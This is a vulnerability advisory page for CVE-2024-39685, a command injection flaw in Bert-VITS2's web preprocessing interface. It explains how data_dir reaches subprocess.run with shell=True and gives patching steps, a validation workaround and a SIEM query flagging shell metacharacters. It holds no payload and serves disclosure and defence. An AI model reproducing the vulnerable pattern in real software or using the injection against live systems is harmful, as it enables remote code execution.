CVE-2024-39685
📋 TL;DR
CVE-2024-39685 is a critical command injection vulnerability in Bert-VITS2 that allows attackers to execute arbitrary commands on the system by manipulating the data_dir variable. This affects all users running Bert-VITS2 version 2.3 or earlier, particularly those exposing the web interface to untrusted users. The vulnerability occurs because user input is passed directly to subprocess.run() with shell=True without proper sanitization.
💻 Affected Systems
- Bert-VITS2
📦 What is this software?
Bert Vits2 by Fish.audio
⚠️ Risk & Real-World Impact
Worst Case
Full system compromise allowing attackers to execute arbitrary commands with the privileges of the Bert-VITS2 process, potentially leading to data theft, ransomware deployment, or complete system takeover.
Likely Case
Remote code execution allowing attackers to run commands, access sensitive data, or pivot to other systems in the network.
If Mitigated
Limited impact if proper input validation and command sanitization are implemented, restricting attackers to safe operations only.
🎯 Exploit Status
The vulnerability is trivial to exploit as it requires simple command injection techniques. Public proof-of-concept code is available in the GitHub Security Lab advisory.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 2.4 or later
Vendor Advisory: https://github.com/fishaudio/Bert-VITS2/security/advisories
Restart Required: Yes
Instructions:
1. Update Bert-VITS2 to version 2.4 or later. 2. Replace shell=True with shell=False in subprocess.run() calls. 3. Use shlex.quote() or similar input sanitization for all user-controlled variables. 4. Restart the Bert-VITS2 service.
🔧 Temporary Workarounds
Input Validation Workaround
allImplement strict input validation for the data_dir parameter to only allow safe characters and paths
# Add input validation before subprocess.run()
import re
if not re.match(r'^[a-zA-Z0-9_\-\.\/]+$', data_dir):
raise ValueError('Invalid data_dir input')
Disable Web Interface
linuxTemporarily disable the web interface until patching is complete
# Stop the Bert-VITS2 web service
sudo systemctl stop bert-vits2
# Or kill the process
pkill -f 'python.*webui_preprocess'
🧯 If You Can't Patch
- Implement network segmentation to isolate Bert-VITS2 instances from critical systems
- Deploy application-level firewall rules to block suspicious command patterns in requests
🔍 How to Verify
Check if Vulnerable:
Check if webui_preprocess.py contains 'subprocess.run(cmd, shell=True)' with user-controlled variables like data_dir. Review lines 46-52 and 130-133 in the file.Check Version:
python -c "import bert_vits2; print(bert_vits2.__version__)" or check the repository version tagVerify Fix Applied:
Verify that shell=True is removed or properly sanitized in subprocess.run() calls, and that version is 2.4 or higher.📡 Detection & Monitoring
Log Indicators:
- Unusual subprocess executions from Bert-VITS2 process
- Commands with shell metacharacters in data_dir parameter
- Failed command execution attempts with special characters
Network Indicators:
- HTTP requests to Bert-VITS2 containing shell metacharacters in parameters
- Unusual outbound connections from Bert-VITS2 host
SIEM Query:
source="bert-vits2.log" AND ("subprocess.run" OR "shell=True") AND (data_dir CONTAINS "|" OR data_dir CONTAINS ";" OR data_dir CONTAINS "&")🔗 References
- https://github.com/fishaudio/Bert-VITS2/blob/3f8c537f4aeb281df3fb3c455eed9a1b64871a81/webui_preprocess.py#L46-L52
- https://github.com/fishaudio/Bert-VITS2/blob/76653b5b6d657143721df2ed6c5c246b4b1d9277/webui_preprocess.py#L130-L133
- https://securitylab.github.com/advisories/GHSL-2024-045_GHSL-2024-047_fishaudio_Bert-VITS2/
- https://github.com/fishaudio/Bert-VITS2/blob/3f8c537f4aeb281df3fb3c455eed9a1b64871a81/webui_preprocess.py#L46-L52
- https://github.com/fishaudio/Bert-VITS2/blob/76653b5b6d657143721df2ed6c5c246b4b1d9277/webui_preprocess.py#L130-L133
- https://securitylab.github.com/advisories/GHSL-2024-045_GHSL-2024-047_fishaudio_Bert-VITS2/
